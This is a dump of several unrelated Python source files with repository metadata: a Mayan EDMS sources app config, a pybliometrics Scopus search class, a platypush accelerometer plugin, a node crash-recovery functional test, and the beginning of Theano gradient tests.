"""The equivalent strain of the outgoing profile of the transport unit."""
| 31.428571 | 78 | 0.772727 |
acfb5d67247fa0a6061e2a912753d57cc0e6846f | 5,813 | py | Python | mayan/apps/sources/apps.py | nadwiabd/insight_edms | 90a09d7ca77cb111c791e307b55a603e82042dfe | [
"Apache-2.0"
] | null | null | null | mayan/apps/sources/apps.py | nadwiabd/insight_edms | 90a09d7ca77cb111c791e307b55a603e82042dfe | [
"Apache-2.0"
] | null | null | null | mayan/apps/sources/apps.py | nadwiabd/insight_edms | 90a09d7ca77cb111c791e307b55a603e82042dfe | [
"Apache-2.0"
] | null | null | null | from __future__ import absolute_import, unicode_literals
from django.utils.translation import ugettext_lazy as _
from kombu import Exchange, Queue
from common import (
MayanAppConfig, MissingItem, menu_object, menu_secondary, menu_sidebar,
menu_setup
)
from common.signals import post_initial_setup, post_upgrade
from converter.links import link_transformation_list
from documents.menus import menu_documents
from documents.signals import post_version_upload
from mayan.celery import app
from navigation import SourceColumn
from rest_api.classes import APIEndPoint
from .classes import StagingFile
from .handlers import (
copy_transformations_to_version, create_default_document_source,
initialize_periodic_tasks
)
from .links import (
link_document_create_multiple, link_setup_sources,
link_setup_source_check_now, link_setup_source_create_imap_email,
link_setup_source_create_pop3_email, link_setup_source_create_watch_folder,
link_setup_source_create_webform, link_setup_source_create_staging_folder,
link_setup_source_delete, link_setup_source_edit, link_setup_source_logs,
link_staging_file_delete, link_upload_version
)
from .widgets import StagingFileThumbnailWidget
class SourcesApp(MayanAppConfig):
    """Django app config for document sources (web form, staging folder,
    POP3/IMAP email, watch folder). ready() wires up UI columns, menus,
    Celery queues/routes and signal handlers."""

    has_tests = True
    name = 'sources'
    verbose_name = _('Sources')

    def ready(self):
        """Register all runtime integration points for the sources app."""
        super(SourcesApp, self).ready()

        # Models are resolved lazily; importing them at module level would
        # run before the app registry is ready.
        POP3Email = self.get_model('POP3Email')
        IMAPEmail = self.get_model('IMAPEmail')
        Source = self.get_model('Source')
        SourceLog = self.get_model('SourceLog')
        StagingFolderSource = self.get_model('StagingFolderSource')
        WatchFolderSource = self.get_model('WatchFolderSource')
        WebFormSource = self.get_model('WebFormSource')

        APIEndPoint(app=self, version_string='1')

        # Prompt the admin to create a first source when none exist.
        MissingItem(
            label=_('Create a document source'),
            description=_(
                'Document sources are the way in which new documents are '
                'feed to Mayan EDMS, create at least a web form source to '
                'be able to upload documents from a browser.'
            ),
            condition=lambda: not Source.objects.exists(),
            view='sources:setup_source_list'
        )

        # List-view columns for staging files and source log entries.
        SourceColumn(
            source=StagingFile,
            label=_('Created'),
            func=lambda context: context['object'].get_date_time_created()
        )

        html_widget = StagingFileThumbnailWidget()

        SourceColumn(
            source=StagingFile,
            label=_('Thumbnail'),
            func=lambda context: html_widget.render(
                instance=context['object'],
            )
        )

        SourceColumn(
            source=SourceLog,
            label=_('Date time'),
            func=lambda context: context['object'].datetime
        )

        SourceColumn(
            source=SourceLog,
            label=_('Message'),
            func=lambda context: context['object'].message
        )

        # Dedicated Celery queues; the periodic queue uses transient
        # delivery (delivery_mode=1).
        app.conf.CELERY_QUEUES.extend(
            (
                Queue(
                    'sources', Exchange('sources'), routing_key='sources'
                ),
                Queue(
                    'sources_periodic', Exchange('sources_periodic'),
                    routing_key='sources_periodic', delivery_mode=1
                ),
            )
        )

        app.conf.CELERY_ROUTES.update(
            {
                'sources.tasks.task_check_interval_source': {
                    'queue': 'sources_periodic'
                },
                'sources.tasks.task_source_handle_upload': {
                    'queue': 'sources'
                },
                'sources.tasks.task_upload_document': {
                    'queue': 'sources'
                },
            }
        )

        # Menu bindings: which links appear for which models/views.
        menu_documents.bind_links(links=(link_document_create_multiple,))

        menu_object.bind_links(
            links=(
                link_setup_source_edit, link_setup_source_delete,
                link_transformation_list, link_setup_source_logs
            ), sources=(
                POP3Email, IMAPEmail, StagingFolderSource, WatchFolderSource,
                WebFormSource
            )
        )
        menu_object.bind_links(
            links=(link_staging_file_delete,), sources=(StagingFile,)
        )
        menu_object.bind_links(
            links=(link_setup_source_check_now,),
            sources=(IMAPEmail, POP3Email, WatchFolderSource,)
        )
        menu_secondary.bind_links(
            links=(
                link_setup_sources, link_setup_source_create_webform,
                link_setup_source_create_staging_folder,
                link_setup_source_create_pop3_email,
                link_setup_source_create_imap_email,
                link_setup_source_create_watch_folder
            ), sources=(
                POP3Email, IMAPEmail, StagingFolderSource, WatchFolderSource,
                WebFormSource, 'sources:setup_source_list',
                'sources:setup_source_create'
            )
        )
        menu_setup.bind_links(links=(link_setup_sources,))
        menu_sidebar.bind_links(
            links=(link_upload_version,),
            sources=(
                'documents:document_version_list', 'documents:upload_version',
                'documents:document_version_revert'
            )
        )

        # Signal handlers; dispatch_uid guards against duplicate connects.
        post_upgrade.connect(
            initialize_periodic_tasks,
            dispatch_uid='initialize_periodic_tasks'
        )
        post_initial_setup.connect(
            create_default_document_source,
            dispatch_uid='create_default_document_source'
        )
        post_version_upload.connect(
            copy_transformations_to_version,
            dispatch_uid='copy_transformations_to_version'
        )
| 34.808383 | 79 | 0.623086 |
acfb5dd7cc8d8ef97ebf34b1bb575b1f1438f091 | 11,149 | py | Python | pybliometrics/scopus/scopus_search.py | raffaem/pybliometrics | aaa84885c2770ee29b23e1d1a41448d42f6db15e | [
"MIT"
] | null | null | null | pybliometrics/scopus/scopus_search.py | raffaem/pybliometrics | aaa84885c2770ee29b23e1d1a41448d42f6db15e | [
"MIT"
] | null | null | null | pybliometrics/scopus/scopus_search.py | raffaem/pybliometrics | aaa84885c2770ee29b23e1d1a41448d42f6db15e | [
"MIT"
] | null | null | null | from collections import namedtuple
from typing import List, NamedTuple, Optional, Tuple, Union
from pybliometrics.scopus.superclasses import Search
from pybliometrics.scopus.utils import check_integrity, chained_get,\
check_parameter_value, check_field_consistency, listify, make_search_summary
class ScopusSearch(Search):
    """Client for the Scopus Search API; parsed documents are exposed via
    the `results` property."""

    @property
    def results(self) -> Optional[List[NamedTuple]]:
        """A list of namedtuples in the form (eid doi pii pubmed_id title
        subtype subtypeDescription creator afid affilname affiliation_city
        affiliation_country author_count author_names author_ids author_afids
        coverDate coverDisplayDate publicationName issn source_id eIssn
        aggregationType volume issueIdentifier article_number pageRange
        description authkeywords citedby_count openaccess freetoread
        freetoreadLabel fund_acr fund_no fund_sponsor).

        Field definitions correspond to
        https://dev.elsevier.com/guides/ScopusSearchViews.htm and return the
        values as-is, except for afid, affilname, affiliation_city,
        affiliation_country, author_names, author_ids and author_afids: These
        information are joined on ";".  In case an author has multiple
        affiliations, they are joined on "-"
        (e.g. Author1Aff;Author2Aff1-Author2Aff2).

        Raises
        ------
        ValueError
            If the elements provided in integrity_fields do not match the
            actual field names (listed above).

        Notes
        -----
        The list of authors and the list of affiliations per author are
        deduplicated.
        """
        # Initiate namedtuple with ordered list of fields
        fields = 'eid doi pii pubmed_id title subtype subtypeDescription ' \
                 'creator afid affilname affiliation_city affiliation_country ' \
                 'author_count author_names author_ids author_afids coverDate '\
                 'coverDisplayDate publicationName issn source_id eIssn '\
                 'aggregationType volume issueIdentifier article_number '\
                 'pageRange description authkeywords citedby_count '\
                 'openaccess freetoread freetoreadLabel fund_acr fund_no fund_sponsor'
        doc = namedtuple('Document', fields)
        check_field_consistency(self._integrity, fields)
        # Parse elements one-by-one
        out = []
        for item in self._json:
            info = {}
            # Parse affiliations
            info["affilname"] = _join(item, 'affilname')
            info["afid"] = _join(item, 'afid')
            info["aff_city"] = _join(item, 'affiliation-city')
            info["aff_country"] = _join(item, 'affiliation-country')
            # Parse authors
            try:
                # Deduplicate list of authors
                authors = _deduplicate(item['author'])
                # Extract information
                surnames = _replace_none([d['surname'] for d in authors])
                firstnames = _replace_none([d['given-name'] for d in authors])
                info["auth_names"] = ";".join([", ".join([t[0], t[1]]) for t in
                                               zip(surnames, firstnames)])
                info["auth_ids"] = ";".join([d['authid'] for d in authors])
                affs = []
                for auth in authors:
                    aff = listify(_deduplicate(auth.get('afid', [])))
                    affs.append('-'.join([d['$'] for d in aff]))
                info["auth_afid"] = (';'.join(affs) or None)
            except KeyError:
                # Document without author information: leave author fields unset.
                pass
            date = item.get('prism:coverDate')
            if isinstance(date, list):
                date = date[0].get('$')
            default = [None, {"$": None}]
            freetoread = chained_get(item, ["freetoread", "value"], default)
            freetoreadLabel = chained_get(item, ["freetoreadLabel", "value"], default)
            new = doc(article_number=item.get('article-number'),
                      title=item.get('dc:title'), fund_no=item.get('fund-no'),
                      fund_sponsor=item.get('fund-sponsor'),
                      subtype=item.get('subtype'), doi=item.get('prism:doi'),
                      subtypeDescription=item.get('subtypeDescription'),
                      issn=item.get('prism:issn'), creator=item.get('dc:creator'),
                      affilname=info.get("affilname"),
                      author_names=info.get("auth_names"),
                      coverDate=date, volume=item.get('prism:volume'),
                      coverDisplayDate=item.get('prism:coverDisplayDate'),
                      publicationName=item.get('prism:publicationName'),
                      source_id=item.get('source-id'), author_ids=info.get("auth_ids"),
                      aggregationType=item.get('prism:aggregationType'),
                      issueIdentifier=item.get('prism:issueIdentifier'),
                      pageRange=item.get('prism:pageRange'),
                      author_afids=info.get("auth_afid"),
                      affiliation_country=info.get("aff_country"),
                      citedby_count=int(item['citedby-count']),
                      openaccess=int(item['openaccess']),
                      freetoread=freetoread[-1]["$"],
                      freetoreadLabel=freetoreadLabel[-1]["$"],
                      eIssn=item.get('prism:eIssn'),
                      author_count=item.get('author-count', {}).get('$'),
                      affiliation_city=info.get("aff_city"), afid=info.get("afid"),
                      description=item.get('dc:description'), pii=item.get('pii'),
                      authkeywords=item.get('authkeywords'), eid=item.get('eid'),
                      fund_acr=item.get('fund-acr'), pubmed_id=item.get('pubmed-id'))
            out.append(new)
        # Finalize
        check_integrity(out, self._integrity, self._action)
        return out or None

    def __init__(self,
                 query: str,
                 refresh: Union[bool, int] = False,
                 view: str = None,
                 verbose: bool = False,
                 download: bool = True,
                 integrity_fields: Union[List[str], Tuple[str, ...]] = None,
                 integrity_action: str = "raise",
                 subscriber: bool = True,
                 **kwds: str
                 ) -> None:
        """Interaction with the Scopus Search API.

        :param query: A string of the query as used in the Advanced Search
                      on scopus.com.  All fields except "INDEXTERMS()" and
                      "LIMIT-TO()" work.
        :param refresh: Whether to refresh the cached file if it exists or not.
                        If int is passed, cached file will be refreshed if the
                        number of days since last modification exceeds that value.
        :param view: Which view to use for the query, see
                     https://dev.elsevier.com/sc_search_views.html.
                     Allowed values: STANDARD, COMPLETE.  If None, defaults to
                     COMPLETE if `subscriber=True` and to STANDARD if
                     `subscriber=False`.
        :param verbose: Whether to print a download progress bar.
        :param download: Whether to download results (if they have not been
                         cached).
        :param integrity_fields: Names of fields whose completeness should
                                 be checked.  ScopusSearch will perform the
                                 action specified in `integrity_action` if
                                 elements in these fields are missing.  This
                                 helps avoiding idiosynchratically missing
                                 elements that should always be present
                                 (e.g., EID or source ID).
        :param integrity_action: What to do in case integrity of provided fields
                                 cannot be verified.  Possible actions:
                                 - "raise": Raise an AttributeError
                                 - "warn": Raise a UserWarning
        :param subscriber: Whether you access Scopus with a subscription or not.
                           For subscribers, Scopus's cursor navigation will be
                           used.  Sets the number of entries in each query
                           iteration to the maximum number allowed by the
                           corresponding view.
        :param kwds: Keywords passed on as query parameters.  Must contain
                     fields and values mentioned in the API specification at
                     https://dev.elsevier.com/documentation/ScopusSearchAPI.wadl.

        Raises
        ------
        ScopusQueryError
            For non-subscribers, if the number of search results exceeds 5000.

        ValueError
            If any of the parameters `integrity_action`, `refresh` or `view`
            is not one of the allowed values.

        Notes
        -----
        The directory for cached results is `{path}/{view}/{fname}`,
        where `path` is specified in your configuration file and `fname` is
        the md5-hashed version of `query`.
        """
        # Checks
        if view:
            check_parameter_value(view, ('STANDARD', 'COMPLETE'), "view")
        allowed = ("warn", "raise")
        check_parameter_value(integrity_action, allowed, "integrity_action")

        # Parameters
        if not view:
            if subscriber:
                view = "COMPLETE"
            else:
                view = "STANDARD"
        count = 25
        if view == "STANDARD" and subscriber:
            count = 200
        # "cursor" and "count" kwargs override the derived pagination values.
        if "cursor" in kwds:
            subscriber = kwds["cursor"]
            kwds.pop("cursor")
        if "count" in kwds:
            count = kwds["count"]
            kwds.pop("count")

        # Query
        self._action = integrity_action
        self._integrity = integrity_fields or []
        self._refresh = refresh
        self._query = query
        self._view = view
        Search.__init__(self, query=query, api='ScopusSearch', count=count,
                        cursor=subscriber, download=download,
                        verbose=verbose, **kwds)

    def __str__(self):
        """Print a summary string."""
        return make_search_summary(self, "document", self.get_eids())

    def get_eids(self):
        """EIDs of retrieved documents."""
        return [d['eid'] for d in self._json]
def _deduplicate(lst):
"""Auxiliary function to deduplicate lst."""
out = []
for i in lst:
if i not in out:
out.append(i)
return out
def _join(item, key, sep=";"):
"""Auxiliary function to join same elements of a list of dictionaries if
the elements are not None.
"""
try:
return sep.join([d[key] or "" for d in item["affiliation"]])
except (KeyError, TypeError):
return None
def _replace_none(lst, repl=""):
"""Auxiliary function to replace None's with another value."""
return [repl if v is None else v for v in lst]
| 47.042194 | 87 | 0.564445 |
acfb5e81f02d1e690c8f73df5337d5ec57054af3 | 2,096 | py | Python | platypush/plugins/gpio/sensor/accelerometer/__init__.py | BlackLight/platypush | 6c0a8bf2599eb4ab41a6122dbd988075d8b1a63a | [
"MIT"
] | 228 | 2018-01-30T11:17:09.000Z | 2022-03-24T11:22:26.000Z | platypush/plugins/gpio/sensor/accelerometer/__init__.py | BlackLight/platypush | 6c0a8bf2599eb4ab41a6122dbd988075d8b1a63a | [
"MIT"
] | 167 | 2017-12-11T19:35:38.000Z | 2022-03-27T14:45:30.000Z | platypush/plugins/gpio/sensor/accelerometer/__init__.py | BlackLight/runbullet | 8d26c8634d2677b4402f0a21b9ab8244b44640db | [
"MIT"
] | 16 | 2018-05-03T07:31:56.000Z | 2021-12-05T19:27:37.000Z | from platypush.plugins import action
from platypush.plugins.gpio.sensor import GpioSensorPlugin
class GpioSensorAccelerometerPlugin(GpioSensorPlugin):
    """
    Plugin to interact with an accelerometer sensor and get X,Y,Z position.
    Tested with Adafruit LIS3DH accelerometer (https://www.adafruit.com/product/2809)
    with Raspberry Pi over I2C connection.

    Requires:

        * ``Adafruit-GPIO`` (``pip install Adafruit-GPIO``)

    """

    def __init__(self, g=4, precision=None, **kwargs):
        """
        Only LIS3DH in I2C mode is currently supported: https://learn.adafruit.com/assets/59080.

        :param g: Accelerometer range as a multiple of G - can be 2G, 4G, 8G or 16G
        :type g: int

        :param precision: If set, the position values will be rounded to the specified number of decimal digits
            (default: no rounding)
        :type precision: int
        """
        super().__init__(**kwargs)
        # Imported lazily so the plugin can be declared without the driver installed.
        from platypush.plugins.gpio.sensor.accelerometer.lib.LIS3DH import LIS3DH

        # Translate the requested multiple of G into the driver's range constant.
        if g == 2:
            self.g = LIS3DH.RANGE_2G
        elif g == 4:
            self.g = LIS3DH.RANGE_4G
        elif g == 8:
            self.g = LIS3DH.RANGE_8G
        elif g == 16:
            self.g = LIS3DH.RANGE_16G
        else:
            raise RuntimeError('Invalid G range: {}'.format(g))

        self.precision = precision
        self.sensor = LIS3DH()
        self.sensor.setRange(self.g)

    @action
    def get_measurement(self):
        """
        Extends :func:`.GpioSensorPlugin.get_measurement`

        :returns: The sensor's current position as a dictionary with the three components (x,y,z) in degrees, each
            between -90 and 90
        """
        # NOTE(review): raw axis readings are scaled by 100 to yield the degree
        # values promised in the docstring — presumably the driver returns
        # fractions of full scale; confirm against the LIS3DH library.
        values = [
            (pos*100 if self.precision is None else round(pos*100, self.precision))
            for pos in (self.sensor.getX(), self.sensor.getY(), self.sensor.getZ())
        ]

        return {
            'name': 'position',
            'value': {
                'x': values[0], 'y': values[1], 'z': values[2]
            }
        }
# vim:sw=4:ts=4:et:
| 30.376812 | 114 | 0.591603 |
acfb5f157530fd1d544e4a420cd2b3864566d344 | 13,430 | py | Python | test/functional/dbcrash.py | wolfoxonly/dk | 090c9862a1a14c187eefcb8285e43601db5ed35b | [
"MIT"
] | null | null | null | test/functional/dbcrash.py | wolfoxonly/dk | 090c9862a1a14c187eefcb8285e43601db5ed35b | [
"MIT"
] | null | null | null | test/functional/dbcrash.py | wolfoxonly/dk | 090c9862a1a14c187eefcb8285e43601db5ed35b | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2017 The Dealtoken Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test recovery from a crash during chainstate writing.
- 4 nodes
* node0, node1, and node2 will have different dbcrash ratios, and different
dbcache sizes
* node3 will be a regular node, with no crashing.
* The nodes will not connect to each other.
- use default test framework starting chain. initialize starting_tip_height to
tip height.
- Main loop:
* generate lots of transactions on node3, enough to fill up a block.
* uniformly randomly pick a tip height from starting_tip_height to
tip_height; with probability 1/(height_difference+4), invalidate this block.
* mine enough blocks to overtake tip_height at start of loop.
* for each node in [node0,node1,node2]:
- for each mined block:
* submit block to node
* if node crashed on/after submitting:
- restart until recovery succeeds
- check that utxo matches node3 using gettxoutsetinfo"""
import errno
import http.client
import random
import sys
import time
from test_framework.mininode import *
from test_framework.script import *
from test_framework.test_framework import DealtokenTestFramework
from test_framework.util import *
# http.client exceptions that indicate the peer disconnected mid-request.
HTTP_DISCONNECT_ERRORS = [http.client.CannotSendRequest]
try:
    # RemoteDisconnected only exists on Python >= 3.5.
    HTTP_DISCONNECT_ERRORS.append(http.client.RemoteDisconnected)
except AttributeError:
    pass
class ChainstateWriteCrashTest(DealtokenTestFramework):
    def set_test_params(self):
        """Configure 4 nodes: three crashing nodes with increasing crash
        ratios/cache sizes, plus one normal full-block-mining node."""
        self.num_nodes = 4
        self.setup_clean_chain = False

        # Set -maxmempool=0 to turn off mempool memory sharing with dbcache
        # Set -rpcservertimeout=900 to reduce socket disconnects in this
        # long-running test
        self.base_args = ["-limitdescendantsize=0", "-maxmempool=0", "-rpcservertimeout=900", "-dbbatchsize=200000"]

        # Set different crash ratios and cache sizes. Note that not all of
        # -dbcache goes to pcoinsTip.
        self.node0_args = ["-dbcrashratio=8", "-dbcache=4"] + self.base_args
        self.node1_args = ["-dbcrashratio=16", "-dbcache=8"] + self.base_args
        self.node2_args = ["-dbcrashratio=24", "-dbcache=16"] + self.base_args

        # Node3 is a normal node with default args, except will mine full blocks
        self.node3_args = ["-blockmaxweight=4000000"]
        self.extra_args = [self.node0_args, self.node1_args, self.node2_args, self.node3_args]
    def setup_network(self):
        """Start all nodes without connecting them; blocks are propagated
        manually via submitblock in this test."""
        # Need a bit of extra time for the nodes to start up for this test
        self.add_nodes(self.num_nodes, extra_args=self.extra_args, timewait=90)
        self.start_nodes()
        # Leave them unconnected, we'll use submitblock directly in this test
def restart_node(self, node_index, expected_tip):
"""Start up a given node id, wait for the tip to reach the given block hash, and calculate the utxo hash.
Exceptions on startup should indicate node crash (due to -dbcrashratio), in which case we try again. Give up
after 60 seconds. Returns the utxo hash of the given node."""
time_start = time.time()
while time.time() - time_start < 120:
try:
# Any of these RPC calls could throw due to node crash
self.start_node(node_index)
self.nodes[node_index].waitforblock(expected_tip)
utxo_hash = self.nodes[node_index].gettxoutsetinfo()['hash_serialized_2']
return utxo_hash
except:
# An exception here should mean the node is about to crash.
# If Dealtokend exits, then try again. wait_for_node_exit()
# should raise an exception if Dealtokend doesn't exit.
self.wait_for_node_exit(node_index, timeout=10)
self.crashed_on_restart += 1
time.sleep(1)
# If we got here, Dealtokend isn't coming back up on restart. Could be a
# bug in Dealtokend, or we've gotten unlucky with our dbcrash ratio --
# perhaps we generated a test case that blew up our cache?
# TODO: If this happens a lot, we should try to restart without -dbcrashratio
# and make sure that recovery happens.
raise AssertionError("Unable to successfully restart node %d in allotted time", node_index)
    def submit_block_catch_error(self, node_index, block):
        """Try submitting a block to the given node.

        Catch any exceptions that indicate the node has crashed.
        Returns true if the block was submitted successfully; false otherwise.

        The except clauses are order-sensitive: BadStatusLine is a subclass of
        http.client exceptions that may also appear in HTTP_DISCONNECT_ERRORS,
        so it must be handled first.
        """
        try:
            self.nodes[node_index].submitblock(block)
            return True
        except http.client.BadStatusLine as e:
            # Prior to 3.5 BadStatusLine('') was raised for a remote disconnect error.
            if sys.version_info[0] == 3 and sys.version_info[1] < 5 and e.line == "''":
                self.log.debug("node %d submitblock raised exception: %s", node_index, e)
                return False
            else:
                raise
        except tuple(HTTP_DISCONNECT_ERRORS) as e:
            # HTTP_DISCONNECT_ERRORS is a module-level tuple of exception types
            # (defined outside this view) that indicate the RPC connection died.
            self.log.debug("node %d submitblock raised exception: %s", node_index, e)
            return False
        except OSError as e:
            self.log.debug("node %d submitblock raised OSError exception: errno=%s", node_index, e.errno)
            if e.errno in [errno.EPIPE, errno.ECONNREFUSED, errno.ECONNRESET]:
                # The node has likely crashed
                return False
            else:
                # Unexpected exception, raise
                raise
    def sync_node3blocks(self, block_hashes):
        """Use submitblock to sync node3's chain with the other nodes

        If submitblock fails, restart the node and get the new utxo hash.
        If any nodes crash while updating, we'll compare utxo hashes to
        ensure recovery was successful.
        """
        node3_utxo_hash = self.nodes[3].gettxoutsetinfo()['hash_serialized_2']

        # Retrieve all the blocks from node3
        blocks = []
        for block_hash in block_hashes:
            # getblock(hash, 0) returns the raw serialized block (hex)
            blocks.append([block_hash, self.nodes[3].getblock(block_hash, 0)])

        # Deliver each block to each other node
        for i in range(3):
            # nodei_utxo_hash is only non-None immediately after a restart;
            # that is the only point where comparing to node3 is cheap
            # (the restart already flushed the cache).
            nodei_utxo_hash = None
            self.log.debug("Syncing blocks to node %d", i)
            for (block_hash, block) in blocks:
                # Get the block from node3, and submit to node_i
                self.log.debug("submitting block %s", block_hash)
                if not self.submit_block_catch_error(i, block):
                    # TODO: more carefully check that the crash is due to -dbcrashratio
                    # (change the exit code perhaps, and check that here?)
                    self.wait_for_node_exit(i, timeout=30)
                    self.log.debug("Restarting node %d after block hash %s", i, block_hash)
                    nodei_utxo_hash = self.restart_node(i, block_hash)
                    assert nodei_utxo_hash is not None
                    self.restart_counts[i] += 1
                else:
                    # Clear it out after successful submitblock calls -- the cached
                    # utxo hash will no longer be correct
                    nodei_utxo_hash = None
            # Check that the utxo hash matches node3's utxo set
            # NOTE: we only check the utxo set if we had to restart the node
            # after the last block submitted:
            # - checking the utxo hash causes a cache flush, which we don't
            # want to do every time; so
            # - we only update the utxo cache after a node restart, since flushing
            # the cache is a no-op at that point
            if nodei_utxo_hash is not None:
                self.log.debug("Checking txoutsetinfo matches for node %d", i)
                assert_equal(nodei_utxo_hash, node3_utxo_hash)
    def verify_utxo_hash(self):
        """Verify that the utxo hash of each node matches node3.

        Restart any nodes that crash while querying (gettxoutsetinfo flushes
        the utxo cache, which can trigger a -dbcrashratio crash, surfacing
        here as an OSError on the RPC connection).
        """
        node3_utxo_hash = self.nodes[3].gettxoutsetinfo()['hash_serialized_2']
        self.log.info("Verifying utxo hash matches for all nodes")
        for i in range(3):
            try:
                nodei_utxo_hash = self.nodes[i].gettxoutsetinfo()['hash_serialized_2']
            except OSError:
                # probably a crash on db flushing
                nodei_utxo_hash = self.restart_node(i, self.nodes[3].getbestblockhash())
            assert_equal(nodei_utxo_hash, node3_utxo_hash)
    def generate_small_transactions(self, node, count, utxo_list):
        """Build and broadcast up to `count` small 2-in/3-out transactions.

        Consumes entries from utxo_list (each a dict with 'txid', 'vout',
        'amount', 'scriptPubKey'); stops early if fewer than two utxos remain.
        """
        FEE = 1000 # TODO: replace this with node relay fee based calculation
        num_transactions = 0
        random.shuffle(utxo_list)
        while len(utxo_list) >= 2 and num_transactions < count:
            tx = CTransaction()
            input_amount = 0
            for i in range(2):
                utxo = utxo_list.pop()
                tx.vin.append(CTxIn(COutPoint(int(utxo['txid'], 16), utxo['vout'])))
                input_amount += int(utxo['amount'] * COIN)
            # Split the remainder evenly over three outputs
            output_amount = (input_amount - FEE) // 3

            if output_amount <= 0:
                # Sanity check -- if we chose inputs that are too small, skip
                continue

            for i in range(3):
                # NOTE(review): all three outputs pay to the scriptPubKey of the
                # *last* popped utxo -- appears intentional for this stress test.
                tx.vout.append(CTxOut(output_amount, hex_str_to_bytes(utxo['scriptPubKey'])))

            # Sign and send the transaction to get into the mempool
            tx_signed_hex = node.signrawtransaction(ToHex(tx))['hex']
            node.sendrawtransaction(tx_signed_hex)
            num_transactions += 1
    def run_test(self):
        """Main test: repeatedly generate transactions and blocks/reorgs on
        node3, replaying them onto the crash-prone nodes 0-2 and verifying
        that their utxo sets recover to match node3's after each crash."""
        # Track test coverage statistics
        self.restart_counts = [0, 0, 0] # Track the restarts for nodes 0-2
        self.crashed_on_restart = 0 # Track count of crashes during recovery

        # Start by creating a lot of utxos on node3
        initial_height = self.nodes[3].getblockcount()
        utxo_list = create_confirmed_utxos(self.nodes[3].getnetworkinfo()['relayfee'], self.nodes[3], 5000)
        self.log.info("Prepped %d utxo entries", len(utxo_list))

        # Sync these blocks with the other nodes
        block_hashes_to_sync = []
        for height in range(initial_height + 1, self.nodes[3].getblockcount() + 1):
            block_hashes_to_sync.append(self.nodes[3].getblockhash(height))

        self.log.debug("Syncing %d blocks with other nodes", len(block_hashes_to_sync))
        # Syncing the blocks could cause nodes to crash, so the test begins here.
        self.sync_node3blocks(block_hashes_to_sync)

        starting_tip_height = self.nodes[3].getblockcount()

        # Main test loop:
        # each time through the loop, generate a bunch of transactions,
        # and then either mine a single new block on the tip, or some-sized reorg.
        for i in range(40):
            self.log.info("Iteration %d, generating 2500 transactions %s", i, self.restart_counts)
            # Generate a bunch of small-ish transactions
            self.generate_small_transactions(self.nodes[3], 2500, utxo_list)
            # Pick a random block between current tip, and starting tip
            current_height = self.nodes[3].getblockcount()
            random_height = random.randint(starting_tip_height, current_height)
            self.log.debug("At height %d, considering height %d", current_height, random_height)
            if random_height > starting_tip_height:
                # Randomly reorg from this point with some probability (1/4 for
                # tip, 1/5 for tip-1, ...)
                if random.random() < 1.0 / (current_height + 4 - random_height):
                    self.log.debug("Invalidating block at height %d", random_height)
                    self.nodes[3].invalidateblock(self.nodes[3].getblockhash(random_height))

            # Now generate new blocks until we pass the old tip height
            self.log.debug("Mining longer tip")
            block_hashes = []
            while current_height + 1 > self.nodes[3].getblockcount():
                # Mine at most 10 blocks per RPC call
                block_hashes.extend(self.nodes[3].generate(min(10, current_height + 1 - self.nodes[3].getblockcount())))
            self.log.debug("Syncing %d new blocks...", len(block_hashes))
            self.sync_node3blocks(block_hashes)
            utxo_list = self.nodes[3].listunspent()
            self.log.debug("Node3 utxo count: %d", len(utxo_list))

        # Check that the utxo hashes agree with node3
        # Useful side effect: each utxo cache gets flushed here, so that we
        # won't get crashes on shutdown at the end of the test.
        self.verify_utxo_hash()

        # Check the test coverage
        self.log.info("Restarted nodes: %s; crashes on restart: %d", self.restart_counts, self.crashed_on_restart)
        # If no nodes were restarted, we didn't test anything.
        assert self.restart_counts != [0, 0, 0]
        # Make sure we tested the case of crash-during-recovery.
        assert self.crashed_on_restart > 0
        # Warn if any of the nodes escaped restart.
        for i in range(3):
            if self.restart_counts[i] == 0:
                self.log.warn("Node %d never crashed during utxo flush!", i)
# Script entry point: run the functional test directly.
if __name__ == "__main__":
    ChainstateWriteCrashTest().main()
| 47.45583 | 120 | 0.640134 |
acfb5f48e736892880cd8c54c5945fbb613ac159 | 20,049 | py | Python | theano/tests/test_gradient.py | ynd/Theano | 5c89596df9e5d8ecafa7d4c0aa8f0f4eb393cd57 | [
"BSD-3-Clause"
] | 1 | 2019-02-27T18:45:20.000Z | 2019-02-27T18:45:20.000Z | theano/tests/test_gradient.py | ynd/Theano | 5c89596df9e5d8ecafa7d4c0aa8f0f4eb393cd57 | [
"BSD-3-Clause"
] | null | null | null | theano/tests/test_gradient.py | ynd/Theano | 5c89596df9e5d8ecafa7d4c0aa8f0f4eb393cd57 | [
"BSD-3-Clause"
] | null | null | null |
#
# UNIT TEST
#
import unittest
import theano
from theano import gof
from theano.tests import unittest_tools as utt
from theano import gradient
from theano.tensor.nnet.Conv3D import conv3D
from theano import config
import numpy as np
from theano.gof.null_type import NullType
# Symbolic constant 1.0, shared as a known output gradient by several tests below.
one = theano.tensor.as_tensor_variable(1.)
def grad_sources_inputs(sources, inputs):
    """
    This implements the old grad_sources_inputs function in terms of
    the new interface so the tests don't need to be rewritten.

    `sources` is a list of (variable, output_gradient) pairs; `inputs` is the
    list of variables to differentiate with respect to, or None to use all
    graph inputs of the source variables.
    """
    if inputs is None:
        source_vars = [source[0] for source in sources]
        inputs = theano.gof.graph.inputs(source_vars)
    grads = theano.gradient.grad(cost=None,
                                 known_grads=dict(sources),
                                 wrt=inputs,
                                 consider_constant=inputs)
    return dict(zip(inputs, grads))
class testgrad_sources_inputs(unittest.TestCase):
    """Tests for the grad_sources_inputs wrapper above, exercising the
    Op.grad() contract for various input/output arities."""

    def test_retNone1(self):
        """Test that it is not ok to return None from op.grad()"""
        class retNone(gof.op.Op):
            def make_node(self):
                inputs = [theano.tensor.vector()]
                outputs = [theano.tensor.vector()]
                return gof.Apply(self, inputs, outputs)

            def grad(self, inp, grads):
                x, = inp
                gz, = grads
                # Implicitly returns None, which violates the grad contract.
                pass
        a = retNone().make_node()
        self.assertRaises(TypeError, grad_sources_inputs, [(a.out, one)], None)

    def test_wrong_rval_len1(self):
        """Test that it is not ok to return the wrong number of gradient terms
        """
        class retOne(gof.op.Op):
            def make_node(self, *inputs):
                outputs = [theano.tensor.vector()]
                return gof.Apply(self, inputs, outputs)

            def grad(self, inputs, grads):
                # Always returns a single term, regardless of input count.
                return [inputs[0].zeros_like()]
        i = theano.tensor.vector()
        j = theano.tensor.vector()
        a1 = retOne().make_node(i)
        grad_sources_inputs([(a1.out, one)], None)
        a2 = retOne().make_node(i, j)
